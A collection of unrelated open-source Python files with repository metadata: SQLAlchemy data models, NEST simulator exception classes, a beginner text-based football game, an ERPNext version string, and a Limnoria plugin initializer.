program_cip = Column(Integer, ForeignKey('program.program_cip'), primary_key=True)
entry_date = Column(Date, nullable=False)
exit_date = Column(Date)
enrolled = Column(Boolean, nullable=False, default=True)
exit_type_id = Column(Integer, ForeignKey('exit_type.type_id'))
obtained_credential = Column(Boolean, nullable=False, default=False)
class ProgramProvider(Base):
__tablename__ = 'program_provider'
program_cip = Column(Integer, ForeignKey('program.program_cip'), primary_key=True)
provider_id = Column(Integer, ForeignKey('provider.provider_id'), primary_key=True)
class Provider(Base):
__tablename__ = 'provider'
provider_id = Column(Integer, primary_key=True)
name = Column(String(140), nullable=False)
type_id = Column(Integer, ForeignKey('entity_type.type_id'), nullable=False)
programs = relationship('Program', secondary='program_provider')
class Outcome(Base):
__tablename__ = 'outcome'
potential_outcome_id = Column(Integer, primary_key=True)
description = Column(String(250), nullable=False)
programs = relationship('Program', backref='outcome')
class ExitType(Base):
__tablename__ = 'exit_type'
type_id = Column(Integer, primary_key=True)
name = Column(String(140), nullable=False)
description = Column(String(250))
participant_programs = relationship('ParticipantProgram', backref='exit_type')
class Wage(Base):
__tablename__ = 'wage'
wage_start_date = Column(Date, primary_key=True)
wage_end_date = Column(Date, primary_key=True)
participant_id = Column(Integer, ForeignKey('participant.participant_id'), primary_key=True)
wage_amt = Column(Float, nullable=False)
class EntityType(Base):
__tablename__ = 'entity_type'
type_id = Column(Integer, primary_key=True)
name = Column(String(140), nullable=False)
description = Column(String(250))
providers = relationship('Provider', backref='entity_type')
|
workforce-data-initiative/tpot-warehouse
|
models/transactional.py
|
Python
|
apache-2.0
| 3,267
|
# -*- coding: utf-8 -*-
#
# hl_api_exceptions.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
class NESTMappedException(type):
"""Metaclass for exception namespace that dynamically creates exception classes.
If a class (self) of this (meta)-type has an unknown attribute requested, __getattr__ defined
below gets called, creating a class with that name (the error name) and with an __init__ taking
commandname and errormessage (as created in the source) which is a closure on the parent and
errorname as well, with a parent of default type (self.default_parent) or
self.parents[errorname] if defined. """
def __getattr__(cls, errorname):
"""Creates a class of type "errorname" which is a child of cls.default_parent or
cls.parents[errorname] if one is defined.
This __getattr__ function also stores the class permanently as an attribute of cls for
re-use where cls is actually the class that triggered the getattr (the class that
NESTMappedException is a metaclass of). """
# Dynamic class construction, first check if we know its parent
if errorname in cls.parents:
parent = getattr(cls, cls.parents[errorname])
else: # otherwise, get the default (SLIException)
parent = cls.default_parent
# and now dynamically construct the new class
# not NESTMappedException, since that would mean the metaclass would let the new class inherit
# this __getattr__, allowing unintended dynamic construction of attributes
newclass = type(
cls.__name__ + '.' + errorname,
(parent,),
{
'__init__': cls.init(parent, errorname),
'__doc__':
"""Dynamically created exception {} from {}.
Created for the namespace: {}.
Parent exception: {}.
""".format(errorname, cls.source, cls.__name__, parent.__name__)
}
)
# Cache for reuse: __getattr__ should now not get called if requested again
setattr(cls, errorname, newclass)
# And now we return the exception
return newclass
class NESTErrors(metaclass=NESTMappedException):
"""Namespace for NEST exceptions, including dynamically created classes from SLI.
Dynamic exception creation is through __getattr__ defined in the metaclass NESTMappedException.
"""
class NESTError(Exception):
"""Base exception class for all NEST exceptions.
"""
def __init__(self, message, *args, **kwargs):
"""Initializer for NESTError base class.
Parameters:
-----------
message: full error message to report.
*args, **kwargs: passed through to Exception base class.
"""
Exception.__init__(self, message, *args, **kwargs)
self.message = message
class SLIException(NESTError):
"""Base class for all exceptions coming from sli.
"""
def __init__(self, commandname, errormessage, errorname='SLIException', *args, **kwargs):
"""Initialize function.
Parameters:
-----------
errorname: error name from SLI.
commandname: command name from SLI.
errormessage: message from SLI.
*args, **kwargs: passed through to NESTErrors.NESTError base class.
"""
message = "{} in {}{}".format(errorname, commandname, errormessage)
NESTErrors.NESTError.__init__(self, message, errorname, commandname, errormessage, *args, **kwargs)
self.errorname = errorname
self.commandname = commandname
self.errormessage = errormessage
class PyNESTError(NESTError):
"""Exceptions produced from Python/Cython code.
"""
pass
@staticmethod
def init(parent, errorname):
""" Static class method to construct init's for SLIException children.
Construct our new init with closure on errorname (as a default value) and parent.
The default value allows the __init__ to be chained and set by the leaf child.
This also moves the paramerization of __init__ away from the class construction logic
and next to the SLIException init.
Parameters:
----------
parent: the ancestor of the class needed to properly walk up the MRO (not possible with super() or
super(type,...) because of the dynamic creation of the function
(used as a closure on the constructed __init__).
errorname: the class name for information purposes
internally (used as a closure on the constructed __init__).
"""
def __init__(self, commandname, errormessage, errorname=errorname, *args, **kwargs):
# recursively init the parent class: all of this is only needed to properly set errorname
parent.__init__(self, commandname, errormessage, *args, errorname=errorname, **kwargs)
docstring = \
"""Initialization function.
Parameters:
-----------
commandname: sli command name.
errormessage: sli error message.
errorname: set by default ("{}") or passed in by child (shouldn't be explicitly set
when creating an instance)
*args, **kwargs: passed through to base class.
self will be a descendant of {}.
""".format(errorname, parent.__name__)
try:
__init__.__doc__ = docstring
except AttributeError:
__init__.__func__.__doc__ = docstring
return __init__
# source: the dynamically created exceptions come from SLI
# default_parent: the dynamically created exceptions are descended from SLIExcepton
# parents: unless they happen to be mapped in this list to another exception descended from SLIException
# these should be updated when new exceptions in sli are created that aren't directly descended
# from SLIException (but nothing bad will happen, it's just that otherwise they'll be directly
# descended from SLIException instead of an intermediate exception; they'll still be constructed
# and useable)
source = "SLI"
default_parent = SLIException
parents = {
'TypeMismatch': 'InterpreterError',
'SystemSignal': 'InterpreterError',
'RangeCheck': 'InterpreterError',
'ArgumentType': 'InterpreterError',
'BadParameterValue': 'SLIException',
'DictError': 'InterpreterError',
'UndefinedName': 'DictError',
'EntryTypeMismatch': 'DictError',
'StackUnderflow': 'InterpreterError',
'IOError': 'SLIException',
'UnaccessedDictionaryEntry': 'DictError',
'UnknownModelName': 'KernelException',
'NewModelNameExists': 'KernelException',
'UnknownModelID': 'KernelException',
'ModelInUse': 'KernelException',
'UnknownSynapseType': 'KernelException',
'UnknownNode': 'KernelException',
'NoThreadSiblingsAvailable': 'KernelException',
'LocalNodeExpected': 'KernelException',
'NodeWithProxiesExpected': 'KernelException',
'UnknownReceptorType': 'KernelException',
'IncompatibleReceptorType': 'KernelException',
'UnknownPort': 'KernelException',
'IllegalConnection': 'KernelException',
'InexistentConnection': 'KernelException',
'UnknownThread': 'KernelException',
'BadDelay': 'KernelException',
'UnexpectedEvent': 'KernelException',
'UnsupportedEvent': 'KernelException',
'BadProperty': 'KernelException',
'BadParameter': 'KernelException',
'DimensionMismatch': 'KernelException',
'DistributionError': 'KernelException',
'SimulationError': 'KernelException',
'InvalidDefaultResolution': 'KernelException',
'InvalidTimeInModel': 'KernelException',
'StepMultipleRequired': 'KernelException',
'TimeMultipleRequired': 'KernelException',
'GSLSolverFailure': 'KernelException',
'NumericalInstability': 'KernelException',
'KeyError': 'KernelException',
'MUSICPortUnconnected': 'KernelException',
'MUSICPortHasNoWidth': 'KernelException',
'MUSICPortAlreadyPublished': 'KernelException',
'MUSICSimulationHasRun': 'KernelException',
'MUSICChannelUnknown': 'KernelException',
'MUSICPortUnknown': 'KernelException',
'MUSICChannelAlreadyMapped': 'KernelException'
}
# So we don't break any code that currently catches a nest.NESTError
NESTError = NESTErrors.NESTError
|
weidel-p/nest-simulator
|
pynest/nest/lib/hl_api_exceptions.py
|
Python
|
gpl-2.0
| 9,411
|
from sys import exit
def eighteenbox_shot():
print"Shoot ball.Here is your chance to score?"
next= raw_input(">")
if "0" in next or "5" in next:
in_score=int(next)
else:
dead("Man you lost an open chance")
if in_score<7:
print "Goaaaal.Perfect short"
exit(0)
else:
dead("Shot saved by keeper")
def mid_field():
print"You're in the mid-field chasing dead the ball"
print"The opponent has the ball.Get it"
print"How are you going to tackle him?"
ball_taken=False
while True:
next=raw_input(">")
if next=="press zero":
dead("This is a foul.You get a red card")
elif next=="press five" and not ball_taken:
print"Ball taken and opponent left for dead"
ball_taken= True
elif next== "press five"and ball_taken:
dead("The opponent was too strong for you.")
elif next=="shoot ball":
eighteenbox_shot()
else:
print"I dont know what to do with the ball"
def loop_ball():
print"You decide to loop the ball past goal-keeper"
print"If keeper make a glimpse on the ball it goes out.No goal"
print"Do you loop or place?"
next=raw_input(">")
if "loop" in next:
start()
elif "place" in next:
dead("Thats too easy for keeper!")
else:
loop_ball()
def dead(why):
why,"Good shot"
exit(0)
def start():
print"You have the ball in 18box yard"
print"You can either loop the ball or fire a shot"
print"Which one do you take?"
next=raw_input(">")
if next=="shoot":
eighteenbox_shot()
elif next=="loop":
loop_ball()
else:
dead("You stumble about and ball taken by the defender")
start()
|
vinnie91/loopgame.py
|
loopgame.py
|
Python
|
gpl-3.0
| 2,115
|
from __future__ import unicode_literals
__version__ = '5.2.0'
|
netfirms/erpnext
|
erpnext/__version__.py
|
Python
|
agpl-3.0
| 62
|
###
# Copyright (c) 2003-2005, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
Provides some internet-related commands.
"""
import supybot
import supybot.world as world
# Use this for the version of this plugin. You may wish to put a CVS keyword
# in here if you're keeping the plugin in CVS or some similar system.
__version__ = "%%VERSION%%"
__author__ = supybot.authors.jemfinch
# This is a dictionary mapping supybot.Author instances to lists of
# contributions.
__contributors__ = {supybot.authors.jamessan: ['whois']}
from . import config
from . import plugin
from imp import reload
reload(plugin) # In case we're being reloaded.
# Add more reloads here if you add third-party modules and want them to be
# reloaded when this plugin is reloaded. Don't forget to import them as well!
if world.testing:
from . import test
Class = plugin.Class
configure = config.configure
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
ProgVal/Limnoria-test
|
plugins/Internet/__init__.py
|
Python
|
bsd-3-clause
| 2,466
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.